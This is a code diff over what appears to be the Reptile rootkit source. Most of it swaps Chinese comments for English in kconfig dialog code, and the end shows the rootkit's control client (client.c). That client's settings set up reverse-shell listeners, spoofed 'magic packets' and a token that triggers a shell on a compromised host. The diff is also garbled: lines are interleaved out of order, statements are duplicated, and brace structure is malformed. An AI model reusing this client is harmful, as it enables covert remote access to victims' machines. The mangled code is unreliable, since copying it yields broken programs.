-            // 检查计算值是否与保存值一致
+			/* check that calculated value agrees with saved value */
-            switch (sym->type) {
+			switch (sym->type) {
-            case S_BOOLEAN:
+			case S_BOOLEAN:
-            case S_TRISTATE:
+			case S_TRISTATE:
-                if (sym->def[S_DEF_USER].tri != sym_get_tristate_value(sym))
+				if (sym->def[S_DEF_USER].tri != sym_get_tristate_value(sym))
-                    break;
+					break;
-                if (!sym_is_choice(sym))
+				if (!sym_is_choice(sym))
-                    continue;
+					continue;
-                // 跌落至下一个case
+				/* fall through */
-            default:
+			default:
-                if (!strcmp(sym->curr.val, sym->def[S_DEF_USER].val))
+				if (!strcmp(sym->curr.val, sym->def[S_DEF_USER].val))
-                    continue;
+					continue;
-                break;
+				break;
-            }
+			}
-        } else if (!sym_has_value(sym) && !(sym->flags & SYMBOL_WRITE))
+		} else if (!sym_has_value(sym) && !(sym->flags & SYMBOL_WRITE))
-            // 没有先前值且未保存
+			/* no previous value and not saved */
-            continue;
+			continue;
-        conf_unsaved++;
+		conf_unsaved++;
-        // 在详细模式下可能打印值...
+		/* maybe print value in verbose mode... */
-    }
+	}
-
+
-    for_all_symbols(i, sym) {
+	for_all_symbols(i, sym) {
-        if (sym_has_value(sym) && !sym_is_choice_value(sym)) {
+		if (sym_has_value(sym) && !sym_is_choice_value(sym)) {
-            // 重置生成值的值，以便它们在出现时会显示为新值，
+			/* Reset values of generates values, so they'll appear
-            // 但如果Kconfig和保存的配置不一致，则不起作用。
+			 * as new, if they should become visible, but that
-            if (sym->visible == no && !conf_unsaved)
+			 * doesn't quite work if the Kconfig and the saved
-                sym->flags &= ~SYMBOL_DEF_USER;
+			 * configuration disagree.
-            switch (sym->type) {
+			 */
-            case S_STRING:
+			if (sym->visible == no && !conf_unsaved)
-            case S_INT:
+				sym->flags &= ~SYMBOL_DEF_USER;
-            case S_HEX:
+			switch (sym->type) {
-                // 如果字符串值超出范围，则重置字符串值
+			case S_STRING:
-                if (sym_string_within_range(sym, sym->def[S_DEF_USER].val))
+			case S_INT:
-                    break;
+			case S_HEX:
-                sym->flags &= ~(SYMBOL_VALID|SYMBOL_DEF_USER);
+				/* Reset a string value if it's out of range */
-                conf_unsaved++;
+				if (sym_string_within_range(sym, sym->def[S_DEF_USER].val))
-                break;
+					break;
-            default:
+				sym->flags &= ~(SYMBOL_VALID|SYMBOL_DEF_USER);
-                break;
+				conf_unsaved++;
-            }
+				break;
-        }
+			default:
-    }
+				break;
-
+			}
-    sym_add_change_count(conf_warnings || conf_unsaved);
+		}
-
+	}
-    return 0;
+
 	sym_add_change_count(conf_warnings || conf_unsaved);
 	return 0;
 }
 /*
--- a/src/Reptile/scripts/kconfig/expr.c
+++ b/src/Reptile/scripts/kconfig/expr.c
--- a/src/Reptile/scripts/kconfig/lxdialog/inputbox.c
+++ b/src/Reptile/scripts/kconfig/lxdialog/inputbox.c
@ -1,286 +1,301 @@
 /*
- *  inputbox.c -- 实现输入框
+ *  inputbox.c -- implements the input box
 *
- *  原作者：Savio Lam (lam836@cs.cuhk.hk)
+ *  ORIGINAL AUTHOR: Savio Lam (lam836@cs.cuhk.hk)
- *  修改为 Linux 内核配置：William Roadcap (roadcap@cfw.com)
+ *  MODIFIED FOR LINUX KERNEL CONFIG BY: William Roadcap (roadcap@cfw.com)
 *
- *  本程序是自由软件；你可以根据自由软件基金会发布的 GNU 通用公共许可证的条款重新分发和/或修改它；要么是许可证的第 2 版，要么（如果你选择的话）是任何后续版本。
+ *  This program is free software; you can redistribute it and/or
 *  modify it under the terms of the GNU General Public License
 *  as published by the Free Software Foundation; either version 2
 *  of the License, or (at your option) any later version.
 *
- *  本程序的分发是希望它能有用，但没有任何保证；甚至没有适销性或适用于特定目的的隐含保证。详见 GNU 通用公共许可证以获取更多详细信息。
+ *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
- *  你应该已经收到了一份 GNU 通用公共许可证的副本；如果没有，请写信给自由软件基金会，Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 */
-#include "dialog.h" 
+#include "dialog.h"
 // 包含对话框相关的头文件
-char dialog_input_result[MAX_LEN + 1]; 
+char dialog_input_result[MAX_LEN + 1];
 // 定义一个字符数组用于存储输入框的结果
 /*
- *  打印终止按钮
+ *  Print the termination buttons
 */
 static void print_buttons(WINDOW * dialog, int height, int width, int selected)
 {
-	int x = width / 2 - 11; 
+	int x = width / 2 - 11;
-	// 计算按钮的起始 x 坐标
+	int y = height - 2;
 	int y = height - 2; 
 	// 计算按钮的起始 y 坐标
-	print_button(dialog, gettext("  Ok  "), y, x, selected == 0); 
+	print_button(dialog, gettext("  Ok  "), y, x, selected == 0);
-	// 打印 "Ok" 按钮
+	print_button(dialog, gettext(" Help "), y, x + 14, selected == 1);
 	print_button(dialog, gettext(" Help "), y, x + 14, selected == 1); 
 	// 打印 "Help" 按钮
-	wmove(dialog, y, x + 1 + 14 * selected); 
+	wmove(dialog, y, x + 1 + 14 * selected);
-	// 移动光标到选中的按钮位置
+	wrefresh(dialog);
 	wrefresh(dialog); 
 	// 刷新对话框窗口
 }
 /*
- * 显示一个用于输入字符串的对话框
+ * Display a dialog box for inputing a string
 */
 int dialog_inputbox(const char *title, const char *prompt, int height, int width,
                    const char *init)
 {
-	int i, x, y, box_y, box_x, box_width; 
+	int i, x, y, box_y, box_x, box_width;
-	// 定义一些变量用于计算和存储位置和大小
+	int input_x = 0, key = 0, button = -1;
-	int input_x = 0, key = 0, button = -1; 
+	int show_x, len, pos;
-	// 定义输入框的 x 坐标、按键和按钮状态变量
+	char *instr = dialog_input_result;
-	int show_x, len, pos; 
+	WINDOW *dialog;
 	// 定义显示 x 坐标、字符串长度和光标位置变量
 	char *instr = dialog_input_result; 
 	// 指向输入结果的指针
 	WINDOW *dialog; 
 	// 定义对话框窗口指针
 	if (!init)
-		instr[0] = '\0'; 
+		instr[0] = '\0';
 		// 如果没有初始值，将输入结果置为空字符串
 	else
-		strcpy(instr, init); 
+		strcpy(instr, init);
 		// 否则，将初始值复制到输入结果中
-do_resize: 
+do_resize:
-// 标签，用于处理窗口大小变化
+	if (getmaxy(stdscr) <= (height - INPUTBOX_HEIGTH_MIN))
-	if (getmaxy(stdscr) <= (height - INPUTBOX_HEIGTH_MIN)) 
+		return -ERRDISPLAYTOOSMALL;
-	// 如果屏幕高度不足以显示对话框
+	if (getmaxx(stdscr) <= (width - INPUTBOX_WIDTH_MIN))
-		return -ERRDISPLAYTOOSMALL; 
+		return -ERRDISPLAYTOOSMALL;
 		// 返回错误代码
 	if (getmaxx(stdscr) <= (width - INPUTBOX_WIDTH_MIN)) 
 	// 如果屏幕宽度不足以显示对话框
 		return -ERRDISPLAYTOOSMALL; 
 		// 返回错误代码
-	/* 在屏幕上居中对话框 */
+	/* center dialog box on screen */
-	x = (getmaxx(stdscr) - width) / 2; 
+	x = (getmaxx(stdscr) - width) / 2;
-	// 计算对话框的 x 坐标
+	y = (getmaxy(stdscr) - height) / 2;
 	y = (getmaxy(stdscr) - height) / 2; 
 	// 计算对话框的 y 坐标
-	draw_shadow(stdscr, y, x, height, width); 
+	draw_shadow(stdscr, y, x, height, width);
 	// 绘制对话框阴影
-	dialog = newwin(height, width, y, x); 
+	dialog = newwin(height, width, y, x);
-	// 创建对话框窗口
+	keypad(dialog, TRUE);
 	keypad(dialog, TRUE); 
 	// 启用对话框窗口的键盘功能
-	draw_box(dialog, 0, 0, height, width, 
+	draw_box(dialog, 0, 0, height, width,
 	// 绘制对话框边框
 		 dlg.dialog.atr, dlg.border.atr);
-	wattrset(dialog, dlg.border.atr); 
+	wattrset(dialog, dlg.border.atr);
-	// 设置对话框边框属性
+	mvwaddch(dialog, height - 3, 0, ACS_LTEE);
 	mvwaddch(dialog, height - 3, 0, ACS_LTEE); 
 	// 绘制左下角边框字符
 	for (i = 0; i < width - 2; i++)
-		waddch(dialog, ACS_HLINE); 
+		waddch(dialog, ACS_HLINE);
-		// 绘制水平边框线
+	wattrset(dialog, dlg.dialog.atr);
-	wattrset(dialog, dlg.dialog.atr); 
+	waddch(dialog, ACS_RTEE);
 	// 设置对话框属性
 	waddch(dialog, ACS_RTEE); 
 	// 绘制右下角边框字符
 	print_title(dialog, title, width);
 	 // 打印对话框标题
-	wattrset(dialog, dlg.dialog.atr); 
+	wattrset(dialog, dlg.dialog.atr);
-	// 设置对话框属性
+	print_autowrap(dialog, prompt, width - 2, 1, 3);
 	print_autowrap(dialog, prompt, width - 2, 1, 3); 
 	// 打印提示信息
-	/* 绘制输入框 */
+	/* Draw the input field box */
-	box_width = width - 6; 
+	box_width = width - 6;
-	// 计算输入框宽度
+	getyx(dialog, y, x);
-	getyx(dialog, y, x); 
+	box_y = y + 2;
-	// 获取当前光标位置
+	box_x = (width - box_width) / 2;
-	box_y = y + 2; 
+	draw_box(dialog, y + 1, box_x - 1, 3, box_width + 2,
 	// 计算输入框的 y 坐标
 	box_x = (width - box_width) / 2; 
 	// 计算输入框的 x 坐标
 	draw_box(dialog, y + 1, box_x - 1, 3, box_width + 2, 
 	// 绘制输入框边框
 		 dlg.dialog.atr, dlg.border.atr);
-	print_buttons(dialog, height, width, 0); 
+	print_buttons(dialog, height, width, 0);
 	// 打印按钮
-	/* 设置初始值 */
+	/* Set up the initial value */
-	wmove(dialog, box_y, box_x); 
+	wmove(dialog, box_y, box_x);
-	// 移动光标到输入框起始位置
+	wattrset(dialog, dlg.inputbox.atr);
 	wattrset(dialog, dlg.inputbox.atr); 
 	// 设置输入框属性
-	len = strlen(instr); 
+	len = strlen(instr);
-	// 获取输入字符串的长度
+	pos = len;
 	pos = len; 
 	// 设置光标位置为字符串长度
-	if (len >= box_width) { 
+	if (len >= box_width) {
-		// 如果字符串长度超过输入框宽度
+		show_x = len - box_width + 1;
-		show_x = len - box_width + 1; 
+		input_x = box_width - 1;
-		// 计算显示起始 x 坐标
+		for (i = 0; i < box_width - 1; i++)
 		input_x = box_width - 1; 
 		// 设置输入框的 x 坐标
 		for (i = 0; i < box_width - 1; i++) 
 		// 在输入框中显示字符串
 			waddch(dialog, instr[show_x + i]);
 	} else {
-		show_x = 0; 
+		show_x = 0;
-		// 设置显示起始 x 坐标为 0
+		input_x = len;
-		input_x = len; 
+		waddstr(dialog, instr);
 		// 设置输入框的 x 坐标为字符串长度
 		waddstr(dialog, instr); 
 		// 在输入框中显示字符串
 	}
-	wmove(dialog, box_y, box_x + input_x); 
+	wmove(dialog, box_y, box_x + input_x);
 	// 移动光标到字符串末尾
-	wrefresh(dialog); 
+	wrefresh(dialog);
 	// 刷新对话框窗口
 	while (key != KEY_ESC) {
-		 // 循环直到按下 ESC 键
+		key = wgetch(dialog);
 		key = wgetch(dialog); 
 		// 获取按键
-		if (button == -1) {	/* 输入框被选中 */
+		if (button == -1) {	/* Input box selected */
 			switch (key) {
-			case TAB: 
+			case TAB:
-			// 制表符键
+			case KEY_UP:
-			case KEY_UP: 
+			case KEY_DOWN:
-			// 向上箭头键
+				break;
-			case KEY_DOWN: 
+			case KEY_BACKSPACE:
-			// 向下箭头键
+			case 127:
-				break; 
+				if (pos) {
-				// 忽略这些按键
+					wattrset(dialog, dlg.inputbox.atr);
-			case KEY_BACKSPACE: 
+					if (input_x == 0) {
-			// 退格键
+						show_x--;
 			case 127: 
 			// ASCII 退格键
 				if (pos) { 
 					// 如果光标位置不为 0
 					wattrset(dialog, dlg.inputbox.atr); 
 					// 设置输入框属性
 					if (input_x == 0) { 
 						// 如果输入框的 x 坐标为 0
 						show_x--; 
 						// 显示起始 x 坐标减 1
 					} else
-						input_x--; 
+						input_x--;
 						// 输入框的 x 坐标减 1
-					if (pos < len) { 
+					if (pos < len) {
-						// 如果光标位置小于字符串长度
+						for (i = pos - 1; i < len; i++) {
 						for (i = pos - 1; i < len; i++) 
 						// 删除字符
 							instr[i] = instr[i+1];
 						}
 					}
-					pos--; 
+					pos--;
-					// 光标位置减 1
+					len--;
 					len--; 
 					// 字符串长度减 1
 					instr[len] = '\0';
-					 // 字符串末尾添加空字符
+					wmove(dialog, box_y, box_x);
-					wmove(dialog, box_y, box_x); 
+					for (i = 0; i < box_width; i++) {
 					// 移动光标到输入框起始位置
 					for (i = 0; i < box_width; i++) { 
 						// 在输入框中显示字符串
 						if (!instr[show_x + i]) {
-							waddch(dialog, ' '); 
+							waddch(dialog, ' ');
 							// 如果字符串结束，添加空格
 							break;
 						}
 						waddch(dialog, instr[show_x + i]);
 					}
-					wmove(dialog, box_y, input_x + box_x); 
+					wmove(dialog, box_y, input_x + box_x);
-					// 移动光标到字符串末尾
+					wrefresh(dialog);
-					wrefresh(dialog); 
+				}
-					// 刷新对话框窗口
+				continue;
 			case KEY_LEFT:
 				if (pos > 0) {
 					if (input_x > 0) {
 						wmove(dialog, box_y, --input_x + box_x);
 					} else if (input_x == 0) {
 						show_x--;
 						wmove(dialog, box_y, box_x);
 						for (i = 0; i < box_width; i++) {
 							if (!instr[show_x + i]) {
 								waddch(dialog, ' ');
 								break;
 							}
 							waddch(dialog, instr[show_x + i]);
 						}
 						wmove(dialog, box_y, box_x);
 					}
 					pos--;
 				}
 				continue;
 			case KEY_RIGHT:
 				if (pos < len) {
 					if (input_x < box_width - 1) {
 						wmove(dialog, box_y, ++input_x + box_x);
 					} else if (input_x == box_width - 1) {
 						show_x++;
 						wmove(dialog, box_y, box_x);
 						for (i = 0; i < box_width; i++) {
 							if (!instr[show_x + i]) {
 								waddch(dialog, ' ');
 								break;
 							}
 							waddch(dialog, instr[show_x + i]);
 						}
 						wmove(dialog, box_y, input_x + box_x);
 					}
 					pos++;
 				}
 				continue;
 			default:
 				if (key < 0x100 && isprint(key)) {
 					if (len < MAX_LEN) {
 						wattrset(dialog, dlg.inputbox.atr);
 						if (pos < len) {
 							for (i = len; i > pos; i--)
 								instr[i] = instr[i-1];
 							instr[pos] = key;
 						} else {
 							instr[len] = key;
 						}
 						pos++;
 						len++;
 						instr[len] = '\0';
 						if (input_x == box_width - 1) {
 							show_x++;
 						} else {
 							input_x++;
 						}
 						wmove(dialog, box_y, box_x);
 						for (i = 0; i < box_width; i++) {
 							if (!instr[show_x + i]) {
 								waddch(dialog, ' ');
 								break;
 							}
 							waddch(dialog, instr[show_x + i]);
 						}
 						wmove(dialog, box_y, input_x + box_x);
 						wrefresh(dialog);
 					} else
 						flash();	/* Alarm user about overflow */
 					continue;
 				}
-				continue; 
+			}
-				// 继续循环
+		}
-			case KEY_LEFT: 
+		switch (key) {
-			// 向左箭头键
+		case 'O':
-				if (pos > 0) { 
+		case 'o':
-					// 如果光标位置大于 0
+			delwin(dialog);
-					if (input_x > 0) { 
+			return 0;
-						// 如果输入
+		case 'H':
-										print_buttons(dialog, height, width, 1); // 打印按钮，选中 "Help" 按钮
+		case 'h':
 			delwin(dialog);
 			return 1;
 		case KEY_UP:
 		case KEY_LEFT:
 			switch (button) {
 			case -1:
 				button = 1;	/* Indicates "Help" button is selected */
 				print_buttons(dialog, height, width, 1);
 				break;
-			case 0: // 如果 "Ok" 按钮被选中
+			case 0:
-				button = -1; // 表示输入框被选中
+				button = -1;	/* Indicates input box is selected */
 				print_buttons(dialog, height, width, 0);
-				wmove(dialog, box_y, box_x + input_x); // 移动光标到输入框
+				wmove(dialog, box_y, box_x + input_x);
-				wrefresh(dialog); // 刷新对话框窗口
+				wrefresh(dialog);
 				break;
-			case 1: // 如果 "Help" 按钮被选中
+			case 1:
-				button = 0; // 表示 "Ok" 按钮被选中
+				button = 0;	/* Indicates "OK" button is selected */
 				print_buttons(dialog, height, width, 0);
 				break;
 			}
 			break;
-		case TAB: // 制表符键
+		case TAB:
-		case KEY_DOWN: // 向下箭头键
+		case KEY_DOWN:
-		case KEY_RIGHT: // 向右箭头键
+		case KEY_RIGHT:
 			switch (button) {
-			case -1: // 如果输入框被选中
+			case -1:
-				button = 0; // 表示 "Ok" 按钮被选中
+				button = 0;	/* Indicates "OK" button is selected */
 				print_buttons(dialog, height, width, 0);
 				break;
-			case 0: // 如果 "Ok" 按钮被选中
+			case 0:
-				button = 1; // 表示 "Help" 按钮被选中
+				button = 1;	/* Indicates "Help" button is selected */
 				print_buttons(dialog, height, width, 1);
 				break;
-			case 1: // 如果 "Help" 按钮被选中
+			case 1:
-				button = -1; // 表示输入框被选中
+				button = -1;	/* Indicates input box is selected */
 				print_buttons(dialog, height, width, 0);
-				wmove(dialog, box_y, box_x + input_x); // 移动光标到输入框
+				wmove(dialog, box_y, box_x + input_x);
-				wrefresh(dialog); // 刷新对话框窗口
+				wrefresh(dialog);
 				break;
 			}
 			break;
-		case ' ': // 空格键
+		case ' ':
-		case '\n': // 回车键
+		case '\n':
-			delwin(dialog); // 删除对话框窗口
+			delwin(dialog);
-			return (button == -1 ? 0 : button); // 返回按钮状态
+			return (button == -1 ? 0 : button);
-		case 'X': // 'X' 键
+		case 'X':
-		case 'x': // 'x' 键
+		case 'x':
-			key = KEY_ESC; // 设置按键为 ESC 键
+			key = KEY_ESC;
 			break;
-		case KEY_ESC: // ESC 键
+		case KEY_ESC:
-			key = on_key_esc(dialog); // 处理 ESC 键
+			key = on_key_esc(dialog);
 			break;
-		case KEY_RESIZE: // 窗口大小变化键
+		case KEY_RESIZE:
-			delwin(dialog); // 删除对话框窗口
+			delwin(dialog);
-			on_key_resize(); // 处理窗口大小变化
+			on_key_resize();
-			goto do_resize; // 跳转到 do_resize 标签重新绘制对话框
+			goto do_resize;
 		}
 	}
-	delwin(dialog); // 删除对话框窗口
+	delwin(dialog);
-	return KEY_ESC; // 返回 ESC 键表示用户取消操作
+	return KEY_ESC;		/* ESC pressed */
-}
+}
--- a/src/Reptile/scripts/kconfig/lxdialog/util.c
+++ b/src/Reptile/scripts/kconfig/lxdialog/util.c
--- a/src/Reptile/scripts/kconfig/lxdialog/yesno.c
+++ b/src/Reptile/scripts/kconfig/lxdialog/yesno.c
@ -19,25 +19,21 @@
 *  Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 */
-
+#include "dialog.h"
 #include "dialog.h"  // 包含对话框库的头文件
 /*
 * Display termination buttons
 */
 static void print_buttons(WINDOW * dialog, int height, int width, int selected)
 {
-	int x = width / 2 - 10;  // 计算 "Yes" 按钮的起始位置
+	int x = width / 2 - 10;
-	int y = height - 2;  // 计算按钮的垂直位置
+	int y = height - 2;
-	print_button(dialog, gettext(" Yes "), y, x, selected == 0);  // 打印 "Yes" 按钮
+	print_button(dialog, gettext(" Yes "), y, x, selected == 0);
-	print_button(dialog, gettext("  No  "), y, x + 13, selected == 1);  // 打印 "No" 按钮
+	print_button(dialog, gettext("  No  "), y, x + 13, selected == 1);
-	wmove(dialog, y, x + 1 + 13 * selected);  // 移动光标到选中的按钮
+	wmove(dialog, y, x + 1 + 13 * selected);
-	wrefresh(dialog);  // 刷新窗口以显示更改
+	wrefresh(dialog);
 }
 /*
@ -45,74 +41,74 @@ static void print_buttons(WINDOW * dialog, int height, int width, int selected)
 */
 int dialog_yesno(const char *title, const char *prompt, int height, int width)
 {
-	int i, x, y, key = 0, button = 0;  // 定义变量用于存储位置、按键和按钮状态
+	int i, x, y, key = 0, button = 0;
-	WINDOW *dialog;  // 定义对话框窗口
+	WINDOW *dialog;
 do_resize:
 	if (getmaxy(stdscr) < (height + YESNO_HEIGTH_MIN))
-		return -ERRDISPLAYTOOSMALL;  // 如果屏幕高度不足以显示对话框，返回错误
+		return -ERRDISPLAYTOOSMALL;
 	if (getmaxx(stdscr) < (width + YESNO_WIDTH_MIN))
-		return -ERRDISPLAYTOOSMALL;  // 如果屏幕宽度不足以显示对话框，返回错误
+		return -ERRDISPLAYTOOSMALL;
 	/* center dialog box on screen */
-	x = (getmaxx(stdscr) - width) / 2;  // 计算对话框的水平中心位置
+	x = (getmaxx(stdscr) - width) / 2;
-	y = (getmaxy(stdscr) - height) / 2;  // 计算对话框的垂直中心位置
+	y = (getmaxy(stdscr) - height) / 2;
-	draw_shadow(stdscr, y, x, height, width);  // 绘制对话框阴影
+	draw_shadow(stdscr, y, x, height, width);
-	dialog = newwin(height, width, y, x);  // 创建对话框窗口
+	dialog = newwin(height, width, y, x);
-	keypad(dialog, TRUE);  // 启用键盘输入处理
+	keypad(dialog, TRUE);
 	draw_box(dialog, 0, 0, height, width,
-		 dlg.dialog.atr, dlg.border.atr);  // 绘制对话框边框
+		 dlg.dialog.atr, dlg.border.atr);
-	wattrset(dialog, dlg.border.atr);  // 设置边框属性
+	wattrset(dialog, dlg.border.atr);
-	mvwaddch(dialog, height - 3, 0, ACS_LTEE);  // 添加左下角字符
+	mvwaddch(dialog, height - 3, 0, ACS_LTEE);
 	for (i = 0; i < width - 2; i++)
-		waddch(dialog, ACS_HLINE);  // 添加水平线
+		waddch(dialog, ACS_HLINE);
-	wattrset(dialog, dlg.dialog.atr);  // 设置对话框属性
+	wattrset(dialog, dlg.dialog.atr);
-	waddch(dialog, ACS_RTEE);  // 添加右下角字符
+	waddch(dialog, ACS_RTEE);
-	print_title(dialog, title, width);  // 打印标题
+	print_title(dialog, title, width);
-	wattrset(dialog, dlg.dialog.atr);  // 设置对话框属性
+	wattrset(dialog, dlg.dialog.atr);
-	print_autowrap(dialog, prompt, width - 2, 1, 3);  // 打印提示信息
+	print_autowrap(dialog, prompt, width - 2, 1, 3);
-	print_buttons(dialog, height, width, 0);  // 打印底部按钮
+	print_buttons(dialog, height, width, 0);
 	while (key != KEY_ESC) {
-		key = wgetch(dialog);  // 获取用户按键输入
+		key = wgetch(dialog);
 		switch (key) {
 		case 'Y':
 		case 'y':
-			delwin(dialog);  // 删除对话框窗口
+			delwin(dialog);
-			return 0;  // 返回0表示 "Yes" 按钮被选中
+			return 0;
 		case 'N':
 		case 'n':
-			delwin(dialog);  // 删除对话框窗口
+			delwin(dialog);
-			return 1;  // 返回1表示 "No" 按钮被选中
+			return 1;
 		case TAB:
 		case KEY_LEFT:
 		case KEY_RIGHT:
 			button = ((key == KEY_LEFT ? --button : ++button) < 0) ? 1 : (button > 1 ? 0 : button);
-			print_buttons(dialog, height, width, button);  // 打印按钮
+			print_buttons(dialog, height, width, button);
-			wrefresh(dialog);  // 刷新窗口以显示更改
+			wrefresh(dialog);
 			break;
 		case ' ':
 		case '\n':
-			delwin(dialog);  // 删除对话框窗口
+			delwin(dialog);
-			return button;  // 返回按钮状态
+			return button;
 		case KEY_ESC:
-			key = on_key_esc(dialog);  // 处理 ESC 键
+			key = on_key_esc(dialog);
 			break;
 		case KEY_RESIZE:
-			delwin(dialog);  // 删除对话框窗口
+			delwin(dialog);
-			on_key_resize();  // 处理窗口大小变化
+			on_key_resize();
-			goto do_resize;  // 重新调整对话框大小
+			goto do_resize;
 		}
 	}
-	delwin(dialog);  // 删除对话框窗口
+	delwin(dialog);
-	return key;		/* ESC pressed */  // 返回 ESC 键
+	return key;		/* ESC pressed */
-}
+}
--- a/src/Reptile/userland/client/client.c
+++ b/src/Reptile/userland/client/client.c
@ -24,16 +24,16 @@
 #include "util.h"
-pid_t pid;// 声明变量用于存储进程ID、监听器和数据包
+pid_t pid;
-char *listener, *packet; //
+char *listener, *packet;
-char *var_str[] = {"lhost", "lport", "srchost", "srcport", "rhost",  // 定义参数名称数组，用于配置工具的参数
+char *var_str[] = {"lhost", "lport", "srchost", "srcport", "rhost",
 		   "rport", "prot",  "pass",    "token"};
-char *var_str_up[] = {"LHOST", "LPORT", "SRCHOST", "SRCPORT", "RHOST",// 定义参数名称的大写版本数组，用于匹配用户输入
+char *var_str_up[] = {"LHOST", "LPORT", "SRCHOST", "SRCPORT", "RHOST",
 		      "RPORT", "PROT",  "PASS",    "TOKEN"};
-char *description[] = {"Local host to receive the shell",// 定义参数描述数组，用于在帮助信息中解释每个参数的作用
+char *description[] = {"Local host to receive the shell",
 		       "Local port to receive the shell",
 		       "Source host on magic packets (spoof)",
 		       "Source port on magic packets (only for TCP/UDP)",
@ -44,7 +44,7 @@ char *description[] = {"Local host to receive the shell",//
 		       "Token to trigger the shell"};
 int num_variables = 9; //() { return sizeof(var_str) / sizeof(char *); }
-char *var_array[] = {NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL};// 定义参数值数组，用于存储用户设置的参数值
+char *var_array[] = {NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL};
 int help(char **args);
 int __exit(char **args);
@ -53,17 +53,15 @@ int unset(char **args);
 int show(char **args);
 int run(char **args);
 int export(char **args);
-int load(char **args);		//客户端操作
+int load(char **args);
-char *builtin_str[] = {"help", "set", "unset", "show", "run", "export", "load", "exit"}; // 定义内置命令数组和对应的函数指针数组
+char *builtin_str[] = {"help", "set", "unset", "show", "run", "export", "load", "exit"};
 int (*builtin_func[])(char **) = {&help, &set, &unset, &show, &run, &export, &load, &__exit};
 int num_builtins()
 // 定义函数返回内置命令的数量
 { return sizeof(builtin_str) / sizeof(char *); }
-int launch(char **args) 
+int launch(char **args)
 // 定义函数用于启动外部程序
 {
 	pid_t pid;
 	int status;
@ -85,31 +83,30 @@ int launch(char **args)
 	return 1;
 }
-void help_set() //help解释其他命令
+void help_set()
 {
 	fprintf(stdout, "%s <variable> <value>\n", builtin_str[1]);
 	fprintf(stdout, "Example: set LHOST 192.168.0.2\n");
 }
 void help_unset()
 // 定义帮助函数，用于解释如何使用set命令
 {
 	fprintf(stdout, "%s <variable>\n", builtin_str[2]);
 	fprintf(stdout, "Example: unset RHOST\n");
 }
-void help_conf(int i)// 定义帮助函数，用于解释如何使用配置文件相关的命令
+void help_conf(int i)
 {
 	fprintf(stdout, "%s <file>\n", builtin_str[i]);
 	fprintf(stdout, "Example: %s client.conf\n", builtin_str[i]);
 }
-void no_help()// 定义函数，当命令不需要帮助信息时调用
+void no_help()
 {
 	fprintf(stdout, "This command doesn't need help\n");
 }
-int help(char **args)// 定义help函数，用于显示帮助信息
+int help(char **args)
 {
 	if (args[0] == NULL)
 		return 1;
@ -152,7 +149,7 @@ int help(char **args)//
 	return 1;
 }
-int __exit(char **args)// 定义__exit函数，用于退出程序并释放资源
+int __exit(char **args)
 {
 	int i;
@ -176,7 +173,7 @@ int __exit(char **args)//
 	return 0;
 }
-int set(char **args)// 定义set函数，用于设置参数值
+int set(char **args)
 {
 	int i;
@ -205,25 +202,21 @@ int set(char **args)//
 	return 1;
 }
-// unset函数用于取消设置某个参数的值
+int unset(char **args)
-int unset(char** args) {
+{
 	int i;
 	// 如果没有提供参数，返回错误代码1
 	if (args[0] == NULL)
 		return 1;
 	// 如果没有提供要取消设置的参数名，打印错误信息并返回错误代码1
 	if (args[1] == NULL) {
 		fprintf(stdout, "%s wrong syntax!\n", bad);
 		return 1;
 	}
 	// 遍历所有参数，查找是否匹配用户提供的参数名
 	for (i = 0; i < num_variables; i++) {
 		if (strcmp(args[1], var_str[i]) == 0 ||
-			strcmp(args[1], var_str_up[i]) == 0) {
+		    strcmp(args[1], var_str_up[i]) == 0) {
 			// 如果找到匹配的参数名，释放之前存储的值，并将其设置为NULL
 			if (var_array[i])
 				free(var_array[i]);
@ -233,90 +226,119 @@ int unset(char** args) {
 		}
 	}
 	// 如果没有找到匹配的参数名，打印错误信息
 	fprintf(stdout, "%s wrong parameter!\n", bad);
 	return 1;
 }
-// show函数用于显示当前所有参数的值和描述
+int show(char **args)
-int show(char** args) {
+{
 	int i;
 	// 如果没有提供参数，返回错误代码1
 	if (args[0] == NULL)
 		return 1;
 	// 打印表头
 	fprintf(stdout, "\n");
 	fprintf(stdout, "\e[00;33mVAR\t\tVALUE\t\t\tDESCRIPTION\e[00m\n\n");
 	// 遍历所有参数，打印其值和描述
 	for (i = 0; i < num_variables; i++) {
 		if (var_array[i]) {
 			// 根据值的长度，调整输出格式，以保持对齐
 			if (strlen(var_array[i]) >= 8) {
 				fprintf(stdout, "%s\t\t%s\t\t%s\n",
-					var_str_up[i], var_array[i], description[i]);
+					var_str_up[i], var_array[i],
-			}
+					description[i]);
-			else if (strlen(var_array[i]) >= 16) {
+			} else if (strlen(var_array[i]) >= 16) {
 				fprintf(stdout, "%s\t\t%s\t%s\n", var_str_up[i],
 					var_array[i], description[i]);
-			}
+			} else {
 			else {
 				fprintf(stdout, "%s\t\t%s\t\t\t%s\n",
-					var_str_up[i], var_array[i], description[i]);
+					var_str_up[i], var_array[i],
 					description[i]);
 			}
-		}
+		} else {
 		else {
 			// 如果参数没有被设置，打印空值
 			fprintf(stdout, "%s\t\t      \t\t\t%s\n", var_str_up[i],
 				description[i]);
 		}
 	}
 	// 打印换行符
 	fprintf(stdout, "\n");
 	return 1;
 }
-// interrupt函数用于处理程序接收到中断信号时的行为
+void interrupt(int signal)
-void interrupt(int signal) {
+{
 	// 打印中断信息
 	fprintf(stdout, "\r");
 	fflush(stdout);
 	fprintf(stdout, "%s Interrupted: %d\n", warn, signal);
 }
-// run函数用于运行配置好的工具
+int run(char **args)
-int run(char** args) {
+{
 	pid_t pid, pid2;
 	int status;
 	//char *envp[1] = {NULL};
 	// 如果没有提供参数，返回错误代码1
 	if (args[0] == NULL)
 		return 1;
-	// 检查必要的参数是否已经被设置
+	if (!var_array[0]) {
-	// ...
+		fprintf(stdout, "%s %s is not defined!\n", bad, var_str_up[0]);
 		return 1;
 	}
 	if (!var_array[1]) {
 		fprintf(stdout, "%s %s is not defined!\n", bad, var_str_up[1]);
 		return 1;
 	}
 	if (!var_array[2]) {
 		fprintf(stdout, "%s %s is not defined!\n", bad, var_str_up[2]);
 		return 1;
 	}
